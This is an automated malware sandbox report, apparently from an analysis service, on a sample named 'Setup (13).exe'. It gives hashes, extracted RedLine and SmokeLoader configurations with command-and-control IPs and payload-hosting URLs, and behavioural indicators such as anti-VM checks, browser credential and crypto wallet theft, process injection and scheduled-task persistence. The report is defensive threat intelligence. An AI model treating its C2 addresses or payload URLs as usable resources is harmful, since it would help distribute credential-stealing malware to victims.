Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
429s -
max time network
1830s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
21-08-2021 10:21
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
Setup (23).exe
Resource
win10v20210408
General
-
Target
Setup (13).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://dl.uploadgram.me/6120bc6269f31h?raw
Extracted
https://dl.uploadgram.me/6120bcfeb5393h?raw
Extracted
https://dl.uploadgram.me/6120c8f91373ch?raw
Extracted
redline
www
185.204.109.146:54891
Extracted
redline
Second_7.5K
45.14.49.200:27625
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
redline
205.185.119.191:18846
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
20_8_rs
jekorikani.xyz:80
Extracted
redline
19.08
95.181.172.100:6795
Extracted
redline
@Gerhdhd
46.8.19.177:41228
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 20 IoCs
resource yara_rule behavioral9/files/0x000300000001312c-62.dat family_redline behavioral9/files/0x000300000001312c-64.dat family_redline behavioral9/files/0x000300000001314b-68.dat family_redline behavioral9/files/0x000300000001314b-88.dat family_redline behavioral9/files/0x000300000001312c-105.dat family_redline behavioral9/files/0x000300000001314b-119.dat family_redline behavioral9/memory/1492-180-0x0000000004480000-0x000000000449C000-memory.dmp family_redline behavioral9/memory/1492-197-0x00000000045A0000-0x00000000045BA000-memory.dmp family_redline behavioral9/memory/2300-199-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/1504-198-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/1504-200-0x0000000000418F7A-mapping.dmp family_redline behavioral9/memory/2300-201-0x0000000000418E52-mapping.dmp family_redline behavioral9/memory/1504-202-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/2504-205-0x000000000041905A-mapping.dmp family_redline behavioral9/memory/2504-203-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/2504-206-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/2300-208-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/2520-212-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral9/memory/2520-213-0x0000000000418F76-mapping.dmp family_redline behavioral9/memory/2520-214-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 3 IoCs
flow pid Process 203 2772 powershell.exe 206 3068 powershell.exe 236 2300 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 38 IoCs
pid Process 1768 hKLxWAmB6h_lA9ugEvBwxrPL.exe 752 98YNxWCS2514X0PHpDcFbBcb.exe 1940 BCtt60lUb4bJD5DgNhLBbnte.exe 1072 YZT8Iy2essV8eBCyCTScl2gF.exe 1608 RyBE1qMZ9cWKbQn1GZuYEQjn.exe 1612 jUZ6li9WSRNIcgHJz6js3sqb.exe 2040 109S01oV51BahE7P5FmiO7My.exe 1980 LeeKCzrU8Y4sx3Rz3YcSn8vW.exe 268 XgAOyfoaY_gWudB0duDCIif0.exe 1856 qRG_IfzvZMtWyuZt1IW5wOCu.exe 1656 hT4cFg82frtRHsFZ3p8gcUUq.exe 1156 nMuZyyhT5O_3WsNSlSv73SXg.exe 796 ClWH5U_Ry5tTIMV2LDfMvK7_.exe 1600 ZzKwPolpJs0022WeKwJpyQNw.exe 1616 0lCH1Ut0rTj5YwZRc84Tmco6.exe 864 _gCsOx8e0Q1gmCuJDgeQu9c7.exe 1492 Yoo8p966jHdZsA9XlwCAc2n0.exe 1724 10QMl_5nm37gIlOrnVRDddWt.exe 2024 FnoYhdabwbrzrHiHCL15DRod.exe 1008 gHzyuVDqYz0a4TsmZpGoRkli.exe 2168 ZzKwPolpJs0022WeKwJpyQNw.exe 2552 jooyu.exe 2600 md8_8eus.exe 2628 98YNxWCS2514X0PHpDcFbBcb.exe 2720 jfiag3g_gg.exe 2628 98YNxWCS2514X0PHpDcFbBcb.exe 1504 109S01oV51BahE7P5FmiO7My.exe 2300 BCtt60lUb4bJD5DgNhLBbnte.exe 2504 LeeKCzrU8Y4sx3Rz3YcSn8vW.exe 2916 jfiag3g_gg.exe 2520 98YNxWCS2514X0PHpDcFbBcb.exe 1764 6BDD.exe 2144 grwbiru 2700 qRG_IfzvZMtWyuZt1IW5wOCu.exe 2608 B7CC.exe 2476 3BA.exe 1068 rnyuf.exe 3720 rnyuf.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hT4cFg82frtRHsFZ3p8gcUUq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nMuZyyhT5O_3WsNSlSv73SXg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _gCsOx8e0Q1gmCuJDgeQu9c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B7CC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _gCsOx8e0Q1gmCuJDgeQu9c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B7CC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hT4cFg82frtRHsFZ3p8gcUUq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FnoYhdabwbrzrHiHCL15DRod.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FnoYhdabwbrzrHiHCL15DRod.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nMuZyyhT5O_3WsNSlSv73SXg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\International\Geo\Nation Setup (13).exe -
Loads dropped DLL 45 IoCs
pid Process 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1968 Setup (13).exe 1724 10QMl_5nm37gIlOrnVRDddWt.exe 1724 10QMl_5nm37gIlOrnVRDddWt.exe 1724 10QMl_5nm37gIlOrnVRDddWt.exe 2552 jooyu.exe 2552 jooyu.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 2752 WerFault.exe 2552 jooyu.exe 2552 jooyu.exe 2476 3BA.exe 2476 3BA.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral9/files/0x0003000000013151-99.dat themida behavioral9/files/0x0003000000013151-103.dat themida behavioral9/files/0x0003000000013158-106.dat themida behavioral9/files/0x0003000000013158-109.dat themida behavioral9/files/0x00040000000055b0-137.dat themida behavioral9/files/0x00040000000055b0-139.dat themida behavioral9/files/0x00040000000055d7-150.dat themida behavioral9/files/0x00040000000055d7-142.dat themida behavioral9/memory/1656-191-0x0000000000DC0000-0x0000000000DC1000-memory.dmp themida behavioral9/memory/1156-189-0x0000000000380000-0x0000000000381000-memory.dmp themida behavioral9/memory/2024-188-0x0000000000D30000-0x0000000000D31000-memory.dmp themida behavioral9/memory/864-187-0x0000000000A60000-0x0000000000A61000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hT4cFg82frtRHsFZ3p8gcUUq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FnoYhdabwbrzrHiHCL15DRod.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nMuZyyhT5O_3WsNSlSv73SXg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _gCsOx8e0Q1gmCuJDgeQu9c7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B7CC.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ipinfo.io 22 ipinfo.io 143 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1656 hT4cFg82frtRHsFZ3p8gcUUq.exe 2024 FnoYhdabwbrzrHiHCL15DRod.exe 1156 nMuZyyhT5O_3WsNSlSv73SXg.exe 864 _gCsOx8e0Q1gmCuJDgeQu9c7.exe 2608 B7CC.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2040 set thread context of 1504 2040 109S01oV51BahE7P5FmiO7My.exe 80 PID 1940 set thread context of 2300 1940 BCtt60lUb4bJD5DgNhLBbnte.exe 77 PID 1980 set thread context of 2504 1980 LeeKCzrU8Y4sx3Rz3YcSn8vW.exe 78 PID 752 set thread context of 2520 752 98YNxWCS2514X0PHpDcFbBcb.exe 81 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 10QMl_5nm37gIlOrnVRDddWt.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 10QMl_5nm37gIlOrnVRDddWt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 10QMl_5nm37gIlOrnVRDddWt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 10QMl_5nm37gIlOrnVRDddWt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 10QMl_5nm37gIlOrnVRDddWt.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2752 1616 WerFault.exe 56 3788 3424 WerFault.exe 112 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI XgAOyfoaY_gWudB0duDCIif0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI XgAOyfoaY_gWudB0duDCIif0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI XgAOyfoaY_gWudB0duDCIif0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI grwbiru Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI grwbiru Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI grwbiru -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1760 schtasks.exe 2984 schtasks.exe 3816 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 2480 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" qRG_IfzvZMtWyuZt1IW5wOCu.exe Set value (str) 